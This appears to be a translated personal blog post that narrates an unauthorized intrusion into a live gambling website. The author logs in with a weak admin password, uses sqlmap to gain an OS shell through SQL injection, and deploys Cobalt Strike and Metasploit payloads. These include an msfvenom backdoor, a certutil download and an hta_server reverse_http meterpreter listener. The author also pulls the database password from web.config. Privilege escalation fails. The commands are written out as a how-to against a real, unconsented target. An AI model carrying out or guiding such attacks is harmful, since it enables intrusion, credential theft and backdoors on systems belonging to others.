An unsuccessful菠菜penetration and some trivial matters

By the way

In a blink of an eye, it's already 2025 and almost time for the Spring Festival. It's almost 5 years since the last article was published on fb. I had wanted to write a series of articles, but I gave up halfway (even it can't be called halfway, it should be called starting halfway and giving up is more appropriate - -!). Recently, I suddenly wanted to write something, but didn't have a public account, so I thought of fb again.

After three years of wearing masks, a lot of things have happened:

The company is laying off employees, cutting salaries, reducing welfare, and continuing to lay off employees, although it has not yet happened to me, but it should be a matter of time. I also have the idea of changing jobs, but I have not made a decision yet.
Myanmar A is even more difficult to describe, sigh
Even more heartbreaking is that the person I like has found a partner. Normally, since they already have a partner, I should quietly leave, but it just so happens that it's the same company, we see each other every day, maybe liking her from the beginning was a mistake~
Every time I contact my family, it's about three things: finding a partner, finding a partner, and still finding a partner

An unsuccessful菠菜penetration and some trivial matters

During the day, it's okay to be immersed in work and not think too much. But after work in the evening, staying alone in the house is the most uncomfortable, so I have to find things to do, play games, watch movies, dramas, courses... and so on. When all these get boring, there was this unsuccessful penetration...

Main content

csOnline

Some菠菜site

1736578829_6782170de8cf134f69526.png!small?1736578844817

Try weak passwords, it didn't take much effort admin/123456, the administrator's awareness of security should not be high

1736578980_678217a4292b4c8e33603.png!small?1736578994489

1736578946_6782178220a80d9d17761.png!small?1736578960453

Ah, should all these be test data？？？

1736580572_67821ddc4afdaf4e811d0.png!small?1736580586614

There is nothing useful in the background, but the菠菜site template login has SQL injection (there is an article on this site), directly use sqlmap

sqlmap -r sql.txt

1736579054_678217ee96c98c0d93d4c.png!small?1736579075310

Confirm there is SQL injection, all have entered the background, so there is no need to view the data, directly add the --os-shell parameter

sqlmap -r sql.txt --dbms mssql --os-shell

Use cs for fileless upload, also referred to the articles on this site

1736579109_6782182510f135fa8d6f4.png!small?1736579124622

1736579128_67821838d8e48dcdd5b56.png!small?1736579143083

Execute this command in os-shell

1736579140_67821844cf29964db4421.png!small?1736579155038

1736579211_6782188b4f5d8d2d03668.png!small?1736579225842

Check the system information, from some cloud

1736579235_678218a343501a8a8799b.png!small?1736579249886

No domain

1736579255_678218b721daf177bd225.png!small?1736579269551

Check the file

1736579268_678218c4ee42f1d645be9.png!small?1736579283420

First, download the Web.config, it may be useful...

Privilege Escalation (Failed)

All the privilege escalation methods built into cs failed, the patches were quite complete...

The web.config has the password for the database sa, but the privilege escalation also failed.

I thought of putting it into msf to give it a try (it seems that cs session spawning to msf can be done directly here, but I haven't used it so I decided to use the traditional method).

Firstly, check the process for anti-virus software or similar through online identification

1736580493_67821d8d82aad14568395.png!small?1736580508027

I searched online and found that there should be no impact

Upload the backdoor generated by msfvenom

1736580513_67821da18dec9e4c4a43f.png!small?1736580527685

1736582647_678225f7bc71731ada3b9.jpg!small?1736582661839

1736580591_67821defc05e6538925a0.png!small?1736580606104

It looks like it was uploaded successfully without any error message, but was it killed?

1736580609_67821e017dcdd47ff3901.png!small?1736580623623

Upload something at random, still 0

It seems that it is not allowed to upload, but there is no error prompt

Try to use certutil to download the remote file

1736580626_67821e12f31973f44505a.png!small?1736580641268

There is definitely enough disk space, but it can't be downloaded, which should be a policy or permission issue.

Later, I found out that msf can also support fileless upload.

use exploit/windows/misc/hta_server

set payload windows/meterpreter/reverse_http

set lhost ip

set lport

exploit –j

A link address will be generated for mshta to access

1736580731_67821e7beb75aaff644e8.png!small?1736580746312

In fact, this penetration is over. The msf built-in module also failed to escalate privileges, so I left, it can't be escalated. No record is made of all the failures.

Summary

The web breakthrough of the target is very simple, after all, there are existing vulnerabilities.
For restrictions on file upload and download, the target can use fileless attacks (I also tried writing files directly later and it was also possible).
For Windows privilege escalation, I am too inexperienced and need to practice more.
In fact, this target can still be tinkered with a bit more, nmap also scanned some other services, and the file section was not thoroughly checked. But I have no heart to do it anymore, it's too tired. I have to work during the day and deal with this at night. Although the things are not many, they have been tinkered with back and forth, and it took almost three nights to write this article.
I am not a full-time penetration tester, so my skills are inevitably insufficient. I hope the bigwigs can give some pointers on the insufficient parts.